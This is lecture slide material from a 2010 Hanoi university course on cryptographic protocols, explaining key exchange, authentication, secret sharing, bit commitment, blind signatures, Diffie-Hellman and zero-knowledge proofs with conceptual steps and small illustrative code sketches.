
Cryptographic Protocols I

Van Nguyen – HUST


Hanoi – 2010
◼ Slides can be downloaded from lecturer’s
personal web:

http://soict.hust.edu.vn/~vannk

Network Security
Email: vannk@soict.hust.edu.vn
Agenda

◼ Cryptographic Protocols: basic concepts
◼ Basic Protocols: Key Exchange, Authentication, Secret Sharing
◼ Intermediate protocols: special DSs, Bit commitment and more
◼ Advanced protocols: ZKP, Blind Signatures
Cryptographic Protocol: basic idea
◼ Cryptography solves problems that involve
secrecy, authentication, integrity, and dishonest
people.
◼ A protocol is a series of steps, involving two or
more parties, designed to accomplish a task.
❑ “series of steps”: the protocol has a sequence, from start to finish.
◼ Every step must be executed in turn, and no step can be taken before the
previous step is finished.
❑ “Involving two or more parties”: at least two people are required to
complete the protocol
◼ one person alone does not make a protocol. A person alone can perform a
series of steps to accomplish a task, but this is not a protocol.
❑ “designed to accomplish a task”: the protocol must achieve
something.
Cryptographic Protocol: other
characteristics
◼ Everyone involved in the protocol must
❑ know the protocol and all of the steps to follow in advance
❑ agree to follow it
◼ The protocol must be unambiguous:
❑ each step must be well defined
❑ there must be no chance of a misunderstanding
◼ The protocol must be complete:
❑ there must be a specified action for every possible situation
◼ A cryptographic protocol involves some cryptographic
algorithm, but generally the goal of the protocol is
something beyond simple secrecy.
◼ The parties might want
❑ to share parts of their secrets to compute a value,
❑ jointly generate a random sequence
❑ convince one another of their identity
❑ or simultaneously sign a contract.
◼ The whole point of using cryptography in a protocol is to
prevent or detect eavesdropping and cheating
❑ — It should not be possible to do more or learn more than what is
specified in the protocol.
List of regular players
◼ Alice: First participant in all the protocols
◼ Bob: Second participant in all the protocols
◼ Carol: Participant in the three- and four-party protocols
◼ Dave: Participant in the four-party protocols
◼ Eve: Eavesdropper
◼ Mallory: Malicious active attacker
◼ Trent: Trusted arbitrator
◼ Walter: Warden who will be guarding Alice and Bob in
some protocols
◼ Peggy: the Prover
◼ Victor: the Verifier
Arbitrated Protocols
◼ Arbitrator: disinterested third party trusted to help
complete a protocol between two mutually distrustful
parties.
◼ In the real world, lawyers are often used as arbitrators.
❑ E.g. Alice is selling a car to Bob, a stranger. Bob wants to pay by
check, but Alice has no way of knowing if the check is good.
❑ Enter a lawyer trusted by both. With his help, Alice and Bob can
use the following protocol to ensure that neither cheats the other:
(1) Alice gives the title to the lawyer
(2) Bob gives the check to Alice.
(3) Alice deposits the check.
(4) After waiting a specified time period for the check to clear, the lawyer gives the
title to Bob. If the check does not clear within the specified time period, Alice
shows proof of this to the lawyer and the lawyer returns the title to Alice.
Adjudicated Protocols
◼ Because of the high cost of hiring arbitrators,
arbitrated protocols can be subdivided into two
subprotocols:
❑ a non-arbitrated subprotocol, executed every time the
parties want to complete the protocol
❑ an arbitrated subprotocol, executed only in
exceptional circumstances — when there is a dispute
Adjudicated Protocols
◼ Example: The contract-signing protocol can be
formalized in this way:
❑ Nonarbitrated subprotocol (executed every time):
◼ (1) Alice and Bob negotiate the terms of the contract.
◼ (2) Alice signs the contract.
◼ (3) Bob signs the contract.
❑ Adjudicated subprotocol (executed only in case of a
dispute):
◼ (4) Alice and Bob appear before a judge.
◼ (5) Alice presents her evidence.
◼ (6) Bob presents his evidence.
◼ (7) The judge rules on the evidence.
Self-Enforcing Protocols
◼ A self-enforcing protocol is the best type of protocol: The
protocol itself guarantees fairness.
❑ No arbitrator is required to complete the protocol.
❑ No adjudicator is required to resolve disputes.
◼ The protocol is constructed so that there cannot be any
disputes
❑ If one of the parties tries to cheat, the other party immediately
detects the cheating and the protocol stops.
◼ Unfortunately, there is not a self-enforcing protocol for
every situation
Key Exchange with Symmetric Cryptography
◼ Assume that Alice and Bob each share a secret key with
the Key Distribution Center (KDC)—Trent in our
protocols.
❑ These keys must be in place before the start of the protocol
(1) Alice calls Trent and requests a session key to communicate with
Bob.
(2) Trent generates a random session key. He encrypts two copies
of it: one in Alice’s key and the other in Bob’s key. Trent sends
both copies to Alice.
(3) Alice decrypts her copy of the session key.
(4) Alice sends Bob his copy of the session key.
(5) Bob decrypts his copy of the session key.
(6) Both Alice and Bob use this session key to communicate
securely.
Key Exchange with Public-Key Cryptography

◼ Alice and Bob use public-key cryptography to agree on a


session key, and use that session key to encrypt data.
◼ In some practical implementations, both Alice’s and
Bob’s signed public keys will be available on a database.

(1) Alice gets Bob’s public key from the KDC.


(2) Alice generates a random session key, encrypts it using Bob’s
public key, and sends it to Bob.
(3) Bob then decrypts Alice’s message using his private key.
(4) Both of them encrypt their communications using the same
session key.
Man-in-the-Middle Attack
◼ Mallory is a lot more powerful than Eve
❑ can also modify messages, delete messages, and generate totally
new ones
◼ Mallory can imitate Bob when talking to Alice and imitate
Alice when talking to Bob
(1) Alice sends Bob her pk. Mallory intercepts this key and sends Bob
his own pk.
(2) Bob sends Alice his pk. Mallory intercepts, sends Alice his own pk.
(3) When Alice sends a message to Bob, encrypted in “Bob’s” pk,
Mallory intercepts it:
Since the message is really encrypted with his own public key, he decrypts it with his
private key, re-encrypts it with Bob’s public key, and sends it on to Bob.
(4) When Bob sends a message to Alice, encrypted in “Alice’s” pk,
Mallory intercepts it: he decrypts it with his private key, re-encrypts it
with Alice’s public key, and sends it on to Alice.
◼ The interlock protocol, invented by Ron Rivest and Adi
Shamir, can protect against the man-in-the-middle attack.
(1) Alice sends Bob her public key.
(2) Bob sends Alice his public key.
(3) Alice encrypts her message using Bob’s public key. She sends half
of the encrypted message to Bob.
(4) Bob encrypts his message using Alice’s public key. He sends half of
the encrypted message to Alice.
(5) Alice sends the other half of her encrypted message to Bob.
(6) Bob puts the two halves of Alice’s message together and decrypts it
with his private key. Bob sends the other half of his encrypted
message to Alice.
(7) Alice puts the two halves of Bob’s message together and decrypts it
with her private key.
Authentication
◼ When Alice logs into a host computer (or an ATM, …),
how does the host know who she is? How does the host
know she is not Eve trying to falsify Alice’s identity?
❑ Traditionally, passwords solve this problem. Alice enters her
password, and the host confirms that it is correct.
❑ Both Alice and the host know this secret piece of knowledge and
the host requests it from Alice every time she tries to log in.
◼ Authentication Using One-Way Functions
❑ the host does not need to know the passwords: it just has to be able
to differentiate valid passwords from invalid ones.
❑ (1) Alice sends the host her password.
❑ (2) The host performs a one-way function on the password.
❑ (3) The host compares the result of the one-way function to the
value it previously stored.
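A minimal sketch of this check in Python, assuming SHA-256 as the one-way function; the salt anticipates the "Dictionary Attacks and Salt" point on the next slide, and all names here are illustrative rather than part of the lecture.

```python
import hashlib, os, secrets

def register(password):
    """Host stores only (salt, H(salt || password)), never the password itself."""
    salt = os.urandom(16)
    return salt, hashlib.sha256(salt + password.encode()).digest()

def login(password, salt, stored_digest):
    """Steps (2)-(3): hash the submitted password and compare with the stored value."""
    digest = hashlib.sha256(salt + password.encode()).digest()
    return secrets.compare_digest(digest, stored_digest)

salt, stored = register("correct horse battery staple")
assert login("correct horse battery staple", salt, stored)
assert not login("wrong guess", salt, stored)
```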
Authentication

◼ Dictionary Attacks and Salt


◼ SKEY
◼ Authentication Using Public-Key
Cryptography
◼ Mutual Authentication Using the Interlock
Protocol
◼ SKID
Authentication and Key Exchange
◼ Needham-Schroeder
(1) Alice sends a message to Trent consisting of her name, Bob’s name, and a random
number: A,B,RA
(2) Trent generates a random session key. He encrypts a message consisting of a random
session key and Alice’s name with the secret key he shares with Bob. Then he
encrypts Alice’s random value, Bob’s name, the key, and the encrypted message with
the secret key he shares with Alice, and sends her the encrypted:
EA (RA,B,K,EB(K,A))
(3) Alice decrypts the message and extracts K. She confirms that RA is the same value
that she sent Trent in step (1). Then she sends Bob the message that Trent encrypted
in his key: EB (K,A)
(4) Bob decrypts the message and extracts K. He then generates another random value,
RB, encrypts it with K, and sends it to Alice: EK(RB)
(5) Alice decrypts the message with K. She computes RB – 1 and encrypts it with K. Then
she sends the message back to Bob: EK(RB – 1)
Authentication and Key Exchange

◼ Otway-Rees:
❑ Fixes the replay attack on Needham-Schroeder
◼ Kerberos
◼ DASS
◼ Denning-Sacco
Secret Splitting
◼ There are ways to take a message and divide it up into
pieces
❑ Each piece by itself means nothing, but put them together and the
message appears.
◼ The simplest sharing scheme splits a message between two
people:
(1) Trent generates a random-bit string, R, the same length as the
message, M.
(2) Trent XORs M with R to generate S: M ⊕ R = S
(3) Trent gives R to Alice and S to Bob
To reconstruct the message, Alice and Bob have only one step to do:
(4) Alice and Bob XOR their pieces together to reconstruct the message:
❑ R ⊕ S = M
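A quick sketch of this two-party splitting in Python (function names are illustrative, not from the lecture):

```python
import secrets

def split(message: bytes):
    """Trent: generate a random pad R of the same length and compute S = M XOR R."""
    r = secrets.token_bytes(len(message))
    s = bytes(m ^ x for m, x in zip(message, r))
    return r, s                      # R goes to Alice, S goes to Bob

def reconstruct(r: bytes, s: bytes) -> bytes:
    """Alice and Bob: XOR the two pieces together to recover M."""
    return bytes(a ^ b for a, b in zip(r, s))

r, s = split(b"attack at dawn")
assert reconstruct(r, s) == b"attack at dawn"
```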
Secret Sharing
◼ A threshold scheme can take any message (a secret
recipe, launch codes etc.) and divide it into n pieces,
called shadows or shares, such that any m of them can
be used to reconstruct the message. More precisely, this
is called an (m,n)-threshold scheme.
❑ With a (3,4)-threshold scheme, Trent can divide his secret sauce
recipe among Alice, Bob, Carol, and Dave, such that any three of
them can put their shadows together and reconstruct the
message.
❑ If Carol is on vacation, Alice, Bob, and Dave can do it. If Bob gets
run over by a bus, Alice, Carol, and Dave can do it. However, if
Bob gets run over by a bus while Carol is on vacation, Alice and
Dave can’t reconstruct the message by themselves.
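The lecture does not name a construction, but the classic way to realize such an (m,n)-threshold scheme is Shamir's polynomial secret sharing. The sketch below is a toy (3,4) illustration over a prime field, under that assumption, not a production implementation.

```python
import random

P = 2**61 - 1  # a prime large enough for the toy secret below

def make_shares(secret, m, n):
    """Hide the secret in the constant term of a random degree-(m-1) polynomial
    and hand out its value at n distinct points (the shadows)."""
    coeffs = [secret] + [random.randrange(P) for _ in range(m - 1)]
    def f(x):
        return sum(c * pow(x, i, P) for i, c in enumerate(coeffs)) % P
    return [(x, f(x)) for x in range(1, n + 1)]

def reconstruct(shares):
    """Lagrange interpolation at x = 0 recovers the constant term (the secret)."""
    secret = 0
    for j, (xj, yj) in enumerate(shares):
        num, den = 1, 1
        for k, (xk, _) in enumerate(shares):
            if k != j:
                num = num * (-xk) % P
                den = den * (xj - xk) % P
        secret = (secret + yj * num * pow(den, -1, P)) % P
    return secret

shares = make_shares(123456789, m=3, n=4)            # a (3,4)-threshold scheme
assert reconstruct(shares[:3]) == 123456789          # any three shadows suffice
assert reconstruct([shares[0], shares[2], shares[3]]) == 123456789
```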
Special Digital Signatures

◼ Undeniable signatures
◼ Designated confirmer signatures
◼ Proxy Signatures
◼ Group Signatures
◼ Fail-Stop Digital Signatures
Bit Commitment
◼ Using symmetric cryptography:
(1) Bob generates a random-bit string, R, and sends it to Alice
(2) Alice creates a message consisting of the bit she wishes to
commit to, b (it can actually be several bits), and Bob’s
random string. She encrypts it with some random key, K,
and sends to Bob: EK (R,b)
That is the commitment portion of the protocol. Bob cannot
decrypt the message, so he does not know what the bit is.
◼ When it comes time for Alice to reveal her bit, the protocol
continues:
(3) Alice sends Bob the key.
(4) Bob decrypts the message to reveal the bit. He checks his random
string to verify the bit’s validity
Bit Commitment
◼ Using one-way functions:
(1) Alice generates two random-bit strings, R1 and R2.
(2) Alice creates a message consisting of her random strings and
the bit she wishes to commit to (it can actually be several
bits).Then computes the one-way function on the message and
sends the result, as well as one of the random strings, to Bob:
H(R1,R2,b),R1
◼ When it comes time for Alice to reveal her bit, the
protocol continues:
(3) Alice sends Bob the original message: (R1,R2,b)
(4) Bob computes the one-way function on the message and
compares it, and R1, with the value and random string he
received in step (2). If they match, the bit is valid.
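A minimal sketch of this hash-based commitment in Python, assuming SHA-256 as the one-way function H; names are illustrative.

```python
import hashlib, secrets

def commit(b: int):
    """Step (2): Alice hashes (R1, R2, b) and reveals only the digest and R1."""
    r1, r2 = secrets.token_bytes(16), secrets.token_bytes(16)
    digest = hashlib.sha256(r1 + r2 + bytes([b])).digest()
    return (digest, r1), (r1, r2, b)     # (sent to Bob, kept secret by Alice)

def verify(sent, opening) -> bool:
    """Steps (3)-(4): Bob recomputes the hash and checks R1 against what he saw in step (2)."""
    digest, r1_seen = sent
    r1, r2, b = opening
    return r1 == r1_seen and hashlib.sha256(r1 + r2 + bytes([b])).digest() == digest

sent, opening = commit(1)
assert verify(sent, opening)
assert not verify(sent, (opening[0], opening[1], 0))   # Alice cannot flip the bit later
```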
Fair Coin Flips

◼ Can use Bit Commitment Protocol


◼ Coin Flipping Using One-Way Functions
Assume Alice and Bob agree on a one-way function f:
(1) Alice chooses a random number, x. She computes y = f(x),
(2) Alice sends y to Bob.
(3) Bob guesses whether x is even or odd and sends his guess to
Alice.
(4) If Bob’s guess is correct, the result of the coin flip is heads. If
Bob’s guess is incorrect, the result of the coin flip is tails. Alice
announces the result of the coin flip and sends x to Bob.
(5) Bob confirms that y = f(x).
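A sketch of one coin flip in Python, assuming SHA-256 as the agreed one-way function f; the variable names are illustrative.

```python
import hashlib, secrets

# Alice's side: choose x and publish y = f(x) before Bob guesses.
x = secrets.randbits(128)
y = hashlib.sha256(str(x).encode()).hexdigest()

# Bob's side: guess the parity of x, knowing only y.
bob_guess_even = secrets.choice([True, False])

# Alice reveals x; the outcome is heads iff Bob guessed the parity correctly.
heads = (x % 2 == 0) == bob_guess_even
assert hashlib.sha256(str(x).encode()).hexdigest() == y   # Bob's step (5)
print("heads" if heads else "tails")
```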
Zero-Knowledge Proofs
◼ Alice: “I know the password to the Federal Reserve System
computer, the ingredients in McDonald’s secret sauce, and
the contents of Volume 4 of Knuth.”
◼ Bob: “No, you don’t.”
◼ Alice: “Yes, I do.”
◼ Bob: “Do not!”
◼ Alice: “Do too!”
◼ Bob: “Prove it!”
◼ Alice: “All right. I’ll tell you.” She whispers in Bob’s ear.
◼ Bob: “That’s interesting. Now I know it, too. I’m going to tell
The Washington Post.”
◼ Alice: “Oops.”
Zero-Knowledge Proofs
◼ Using one-way functions, Peggy could perform a zero-
knowledge proof.
❑ This protocol proves to Victor that Peggy does have a piece of
information BUT
❑ It does not give Victor any way to know what the information is.
◼ These proofs take the form of interactive protocols. Victor
asks Peggy a series of questions.
❑ If Peggy knows the secret, she can answer all the questions
correctly.
❑ If she does not, she has only a 50 percent chance of answering
each question correctly.
◼ After 10 or so questions ➔ Victor will be convinced.
❑ Yet none of the questions or answers gives Victor any information
about Peggy’s information—only about her knowledge of it.
Zero-Knowledge Proofs

◼ The cave has a secret.


❑ Someone who knows the magic
words can open the secret door
between C and D.
❑ To everyone else, both passages
lead to dead ends.
◼ Peggy knows the secret of the
cave.
❑ She wants to prove her knowledge
to Victor, but she doesn’t want to
reveal the magic words.
Blind Signatures
◼ An essential feature of digital signature protocols is that the
signer knows what he is signing.
◼ We might want people to sign documents without ever seeing
their contents.
❑ Bob is a notary public. Alice wants him to sign a document, but does
not want him to have any idea what he is signing.
◼ Bob doesn’t care what the document says; he is just certifying that he notarized it at a
certain time. He is willing to go along with this.
❑ (1) Alice takes the document and multiplies it by a random value. This
random value is called a blinding factor.
❑ (2) Alice sends the blinded document to Bob.
❑ (3) Bob signs the blinded document.
❑ (4) Alice divides out the blinding factor, leaving the original document
signed by Bob.
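Chaum's RSA-based blind signature is the standard way to instantiate these four steps; the lecture does not fix an algorithm, so the sketch below uses textbook RSA with toy parameters (no padding), purely as an illustration.

```python
import math, secrets

# Toy RSA key for Bob the notary (real keys would use a ~2048-bit modulus).
p, q, e = 61, 53, 17
n = p * q                                    # 3233
d = pow(e, -1, (p - 1) * (q - 1))            # Bob's private exponent

m = 65                                       # the document, encoded as a number < n

# (1) Alice blinds the document with a random factor r coprime to n.
r = secrets.randbelow(n - 2) + 2
while math.gcd(r, n) != 1:
    r = secrets.randbelow(n - 2) + 2
blinded = (m * pow(r, e, n)) % n

# (2)-(3) Bob signs the blinded value without learning m.
blind_sig = pow(blinded, d, n)

# (4) Alice divides out the blinding factor, leaving Bob's signature on m.
sig = (blind_sig * pow(r, -1, n)) % n

assert sig == pow(m, d, n)                   # identical to Bob signing m directly
assert pow(sig, e, n) == m                   # anyone can verify with Bob's public key
```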
Blind Signatures

◼ The properties of completely blind signatures are:


1. Bob’s signature on the document is valid.
❑ The signature is a proof that Bob signed the document.
❑ It will convince Bob that he signed the document if it is ever
shown to him.
❑ It also has all of the other properties of digital signatures.
2. Bob cannot correlate the signed document with the act of
signing the document.
❑ Even if he keeps records of every blind signature he makes, he
cannot determine when he signed any given document.
Cryptographic Protocols II

Van Nguyen – HUT


Hanoi – 2010
Agenda

◼ Cryptographic Protocols: basic concepts
◼ Key Exchange: the Diffie-Hellman protocol
◼ Blind Signatures
◼ Zero-Knowledge Protocols
Whitfield Diffie and Martin Hellman are called the inventors of
Public Key Cryptography. Diffie-Hellman Key Exchange is the first
Public Key Algorithm published in 1976.

DIFFIE-HELLMAN KEY
EXCHANGE
What is Diffie-Hellman?

◼ A Public Key Algorithm


◼ Only for Key Exchange
◼ Does NOT Encrypt or Decrypt
◼ Based on Discrete Logarithms
◼ Widely used in Security Protocols and
Commercial Products
◼ Williamson of Britain’s CESG claims to have
discovered it several years prior to 1976

Discrete Logarithms

◼ What is a logarithm?
◼ log_10 100 = 2 because 10^2 = 100
◼ In general, if log_m b = a then m^a = b
◼ where m is called the base of the logarithm
◼ A discrete logarithm can be defined for
integers only
◼ In fact we can define discrete logarithms
mod p also, where p is any prime number
Discrete Logarithm Problem

◼ The security of the Diffie-Hellman algorithm


depends on the difficulty of solving the
discrete logarithm problem (DLP) in the
multiplicative group of a finite field
Sets, Groups and Fields

◼ A set is any collection of objects called the


elements of the set
◼ Examples of sets: R, Z, Q
◼ If we can define an operation on the elements
of the set and certain rules are followed then
we get other mathematical structures called
groups and fields
Groups
◼ A group is a set G with a custom-defined binary
operation + such that:
❑ The group is closed under +, i.e., for a, b ∈ G:
◼ a + b ∈ G
❑ The Associative Law holds, i.e., for any a, b, c ∈ G:
◼ a + (b + c) = (a + b) + c
❑ There exists an identity element 0, such that
◼ a + 0 = a
❑ For each a ∈ G there exists an inverse element –a
such that
◼ a + (-a) = 0
◼ If for all a, b ∈ G: a + b = b + a, then the group is
called an Abelian or commutative group
◼ If a group G has a finite number of elements it is
called a finite group
More About Group Operations

◼ + does not necessarily mean normal


arithmetic addition
◼ + just indicates a binary operation which can
be custom defined
◼ The group operation could be denoted as •
◼ The group notation with + is called the
additive notation and the group notation with •
is called the multiplicative notation
Fields

◼ A field is a set F with two custom-defined binary
operations + and • such that:
❑ The field is closed under + and •, i.e., for a, b ∈ F:
◼ a + b ∈ F and a • b ∈ F
❑ The Associative Law holds, i.e., for any a, b, c ∈ F:
◼ a + (b + c) = (a + b) + c and a • (b • c) = (a • b) • c
❑ There exist identity elements 0 and 1, such that
◼ a + 0 = a and a • 1 = a
❑ For each a ∈ F there exist inverse elements –a and a^-1
such that
◼ a + (-a) = 0 and a • a^-1 = 1
◼ If a field F has a finite number of elements it is
called a finite field
Examples of Groups
◼ Groups
❑ Set of real numbers R under +
❑ Set of real numbers R under *
❑ Set of integers Z under +
❑ Set of integers Z under *?
❑ Set of integers modulo a prime number p under +
❑ Set of integers modulo a prime number p under *
❑ Set of 3 X 3 matrices under + meaning matrix addition
❑ Set of 3 X 3 matrices under * meaning matrix
multiplication?
◼ Fields
❑ Set of real numbers R under + and *
❑ Set of integers Z under + and *
❑ Set of integers modulo a prime number p under + and *
Generator of Group
◼ If for a ∈ G, all members of the group can be
written in terms of a by applying the group
operation * on a a number of times, then a is
called a generator of the group G
◼ Examples
❑ 2 is a generator of Z*11
❑ 2 and 3 are generators of Z*19

m:           1  2  3  4  5  6  7  8  9  10
2^m mod 11:  2  4  8  5  10 9  7  3  6  1

m:           1  2  3  4  5  6  7  8  9  10 11 12 13 14 15 16 17 18
2^m mod 19:  2  4  8  16 13 7  14 9  18 17 15 11 3  6  12 5  10 1
3^m mod 19:  3  9  8  5  15 7  2  6  18 16 10 11 14 4  12 17 13 1
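The tables above can be reproduced with a few lines of Python (the helper name is illustrative):

```python
def powers(a, p):
    """List a^m mod p for m = 1 .. p-1; a generates Z*_p iff all p-1 residues appear."""
    return [pow(a, m, p) for m in range(1, p)]

print(powers(2, 11))   # [2, 4, 8, 5, 10, 9, 7, 3, 6, 1]  -> 2 generates Z*_11
print(powers(2, 19))   # all 18 residues appear            -> 2 generates Z*_19
print(powers(3, 19))   # all 18 residues appear            -> 3 generates Z*_19
assert len(set(powers(2, 11))) == 10
```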
Primitive Roots
◼ If a^n = x then a is called the n-th root of x
◼ For any prime number p, if we have a number a
such that powers of a mod p generate all the
numbers between 1 and p-1, then a is called a
Primitive Root of p.
◼ In terms of the Group terminology, a is the generator
element of the multiplicative group of the finite field
formed by mod p
◼ Then for any integer b and a primitive root a of prime
number p we can find a unique exponent i such that
b = a^i mod p
◼ The exponent i is referred to as the discrete
logarithm, or index, of b for the base a.
Diffie-Hellman Algorithm

◼ Five Parts
1. Global Public Elements
2. User A Key Generation
3. User B Key Generation
4. Generation of Secret Key by User A
5. Generation of Secret Key by User B

Global Public Elements

◼ q: a prime number
◼ α: α < q, where α is a primitive root of q
◼ The global public elements are also
sometimes called the domain parameters

User A Key Generation

◼ Select private XA, with XA < q
◼ Calculate public YA = α^XA mod q
User B Key Generation

◼ Select private XB, with XB < q
◼ Calculate public YB = α^XB mod q
Generation of Secret Key by User A

◼ K = (YB)^XA mod q
Generation of Secret Key by User B

◼ K = (YA)^XB mod q
Diffie-Hellman Key Exchange
Diffie-Hellman Example

◼ q = 97
◼ α = 5
◼ XA = 36
◼ XB = 58
◼ YA = 5^36 mod 97 = 50
◼ YB = 5^58 mod 97 = 44
◼ K = (YB)^XA mod q = 44^36 mod 97 = 75
◼ K = (YA)^XB mod q = 50^58 mod 97 = 75
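The example can be checked with Python's built-in modular exponentiation:

```python
# The numbers from the example above, verified with pow(base, exp, mod).
q, alpha = 97, 5                 # public: prime modulus and primitive root
xa, xb = 36, 58                  # private keys chosen by A and B

ya = pow(alpha, xa, q)           # 50  (A's public key)
yb = pow(alpha, xb, q)           # 44  (B's public key)

k_a = pow(yb, xa, q)             # secret computed by A
k_b = pow(ya, xb, q)             # secret computed by B
assert ya == 50 and yb == 44
assert k_a == k_b == 75          # both sides arrive at the shared secret 75
```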
Why Diffie-Hellman is Secure?

◼ Opponent has q, α, YA and YB


◼ To get XA or XB the opponent is forced to take
a discrete logarithm
◼ The security of the Diffie-Hellman Key
Exchange lies in the fact that, while it is
relatively easy to calculate exponentials
modulo a prime, it is very difficult to calculate
discrete logarithms. For large primes, the
latter task is considered infeasible.
Homework: Man-in-the-middle-attack

◼ Find out yourself (maybe from the Internet)


how this attack can be implemented
successfully against Diffie-Hellman protocol
◼ Suggest a way to prevent against this attack
ZERO-KNOWLEDGE
PROTOCOLS
The Cave of the Forty Thieves
Properties of Zero-Knowledge Proofs

◼ Completeness – A prover who knows the


secret information can prove it with
probability 1.
◼ Soundness – The probability that a prover
who does not know the secret information
can get away with it can be made arbitrarily
small.
Identification

◼ Alice is identified by some secret she alone is


known to possess - e.g. a password
◼ Problems
❑ The authenticator must be trusted
❑ If secret sniffed or given to untrusted party, can
impersonate
◼ Use zero knowledge!
Fiat-Shamir Identification
One-time setup:
◼ Trusted center publishes modulus n = pq, but
keeps p and q secret
◼ Alice selects a secret s coprime to n,
computes v = s^2 mod n, and registers v with
the trusted center as her public key
Fiat-Shamir Identification

Protocol messages (r is a fresh random value chosen by Alice for each round):
A → B: x = r^2 mod n
B → A: e from {0, 1}
A → B: y = r·s^e mod n
B accepts the round iff y^2 = x·v^e mod n

Fiat-Shamir Identification

Protocol messages:
A → B: x = r^2 mod n
B → A: e from {0, 1}
A → B: y = r·s^e mod n
If e = 0, then the response y = r is
independent of the secret s

Fiat-Shamir Identification

Protocol messages:
A → B: x = r^2 mod n
B → A: e from {0, 1}
A → B: y = r·s^e mod n
If e = 1, then information pairs (x, y) can
be simulated by choosing y randomly,
and setting x = y^2/v mod n
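A sketch of one protocol round in Python with toy parameters (a real modulus n would be RSA-sized); the acceptance test y² ≡ x·vᵉ (mod n) is the standard verification for this scheme, and the specific numbers are illustrative.

```python
import secrets

# One-time setup (toy sizes).
p, q = 2003, 2087                  # known only to the trusted centre
n = p * q
s = 1234567                        # Alice's secret, coprime to n
v = pow(s, 2, n)                   # Alice's registered public key

def fiat_shamir_round():
    # A -> B: commitment x = r^2 mod n
    r = secrets.randbelow(n - 2) + 2
    x = pow(r, 2, n)
    # B -> A: random challenge bit e
    e = secrets.randbelow(2)
    # A -> B: response y = r * s^e mod n
    y = (r * pow(s, e, n)) % n
    # B accepts iff y^2 = x * v^e (mod n)
    return pow(y, 2, n) == (x * pow(v, e, n)) % n

assert all(fiat_shamir_round() for _ in range(20))   # honest prover always passes
```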
Bit Commitments and Zero-Knowledge

◼ Bit commitments are used in zero-knowledge


proofs to encode the secret information.
◼ For example, zero-knowledge proofs based
on graph colorings exist. In this case, bit
commitment schemes are used to encode the
colors.
◼ Complex zero-knowledge proofs with large
numbers of intermediate steps that must be
verified also use bit commitment schemes.
Bit Commitments

◼ “Flipping a coin down a well”


◼ “Flipping a coin by telephone”
◼ A value of 0 or 1 is committed to by the
prover by encrypting it with a one-way
function, creating a “blob”. The verifier can
then “unwrap” this blob when it becomes
necessary by revealing the key.
Bit Commitment Properties

◼ Concealing – The verifier cannot determine


the value of the bit from the blob.
◼ Binding – The prover cannot open the blob as
both a zero and a one.
Bit Commitments: An Example
◼ Let n = pq, where p and q are prime. Let m be a
quadratic nonresidue modulo n. The values m and n are
public, and the values p and q are known only to Peggy.
◼ Peggy commits to the bit b by choosing a random x and
sending Vic the blob m^b·x^2 mod n.
◼ When the time comes for Vic to check the value of the
bit, Peggy simply reveals the values b and x.
◼ Since no known polynomial-time algorithm exists for
solving the quadratic residuosity problem modulo a
composite n whose factors are unknown, this
scheme is computationally concealing.
◼ On the other hand, it is perfectly binding, since if it
weren’t, m would have to be a quadratic residue, a
contradiction.
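A toy sketch of this blob construction in Python; the primes, and the use of Euler's criterion to pick a public nonresidue m, are illustrative choices rather than part of the lecture.

```python
import secrets

p, q = 499, 547                      # known only to Peggy
n = p * q

def is_nonresidue(m):
    """m is a quadratic nonresidue mod n if it is a nonresidue mod p and mod q."""
    return pow(m, (p - 1) // 2, p) == p - 1 and pow(m, (q - 1) // 2, q) == q - 1

m = next(c for c in range(2, n) if is_nonresidue(c))   # public nonresidue

def commit(b):
    x = secrets.randbelow(n - 2) + 2
    blob = (pow(m, b, n) * pow(x, 2, n)) % n            # the blob m^b * x^2 mod n
    return blob, (b, x)

def open_blob(blob, b, x):
    return blob == (pow(m, b, n) * pow(x, 2, n)) % n

blob, (b, x) = commit(1)
assert open_blob(blob, b, x)
assert not open_blob(blob, 1 - b, x)    # the same x cannot open the other bit
```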
“fake” ZKP
◼ Consider this simple protocol
1. If the prover claims to be A, the verifier chooses a
random message M, and sends the ciphertext C =
PA(M) to the prover.
2. The prover decrypts C using SA and sends the result
M’ to the verifier.
3. The verifier accepts the identity of the prover if and
only if M’ = M.
◼ At first sight, it may seem OK:
❑ V already knows M
◼ But WRONG! What if the verifier is an adversary?
Fixed protocol
1. If P claims to be A, V chooses a random
message M, and sends C = PA (M) to P
2. P decrypts C using SA and sends V a
commitment to the result commitpk(r,M’)
3. V ➔ P: M.
4. P checks if M = M’. If not, he stops the protocol.
Otherwise he opens the commitment, P ➔ V: r, M’
5. V accepts the identity of the prover if and only if
M’ = M and the pair r,M’ correctly opens the
commitment
Another Example of ZKP

◼ Peggy the prover would like to show Vic the verifier that
an element b is a member of the subgroup of Zn*
generated by α, where α has order l (i.e., does α^k = b
for some k such that 0 ≤ k ≤ l?)
◼ Peggy chooses a random j, 0 ≤ j ≤ l – 1, and sends Vic α^j.
◼ Vic chooses a random i = 0 or 1, and sends it to Peggy.
◼ Peggy computes j + ik mod l, and sends it to Vic.
◼ Vic checks that α^(j + ik) = α^j·(α^k)^i = α^j·b^i.
◼ They then repeat the above steps log2 n times.
◼ If Vic’s final computation checks out in each round, he
accepts the proof.
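A sketch of one round in Python with toy parameters (p = 1019 is a safe prime and α = 4 generates a subgroup of order l = 509); these parameter choices are illustrative.

```python
import secrets

p, l, alpha = 1019, 509, 4
k = secrets.randbelow(l)            # Peggy's secret exponent
b = pow(alpha, k, p)                # public: Peggy claims b lies in the subgroup <alpha>

def round_ok():
    j = secrets.randbelow(l)        # Peggy's random exponent
    gamma = pow(alpha, j, p)        # Peggy -> Vic: alpha^j
    i = secrets.randbelow(2)        # Vic -> Peggy: challenge bit
    h = (j + i * k) % l             # Peggy -> Vic: j + i*k mod l
    return pow(alpha, h, p) == (gamma * pow(b, i, p)) % p   # Vic's check

assert all(round_ok() for _ in range(20))   # an honest Peggy convinces Vic every round
```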
Complexity Theory

◼ The last proof works because the problem of
solving discrete logarithms is believed to be
computationally intractable.
◼ It has been shown that all problems in NP
have a zero-knowledge proof associated with
them.
Computational Assumptions

◼ A zero-knowledge proof assumes the prover


possesses unlimited computational power.
◼ It is more practical in some cases to assume
that the prover’s computational abilities are
bounded. In this case, we have a zero-
knowledge argument.
Proof vs. Argument

Zero-Knowledge Proof:
◼ Unconditional completeness
◼ Unconditional soundness
◼ Computational zero-knowledge
◼ Unconditionally binding blobs
◼ Computationally concealing blobs

Zero-Knowledge Argument:
◼ Unconditional completeness
◼ Computational soundness
◼ Perfect zero-knowledge
◼ Computationally binding blobs
◼ Unconditionally concealing blobs
Applications

◼ Zero-knowledge proofs can be applied where


secret knowledge too sensitive to reveal
needs to be verified
◼ Key authentication
◼ PIN numbers
◼ Smart cards
Limitations

◼ A zero-knowledge proof is
only as good as the secret
it is trying to conceal
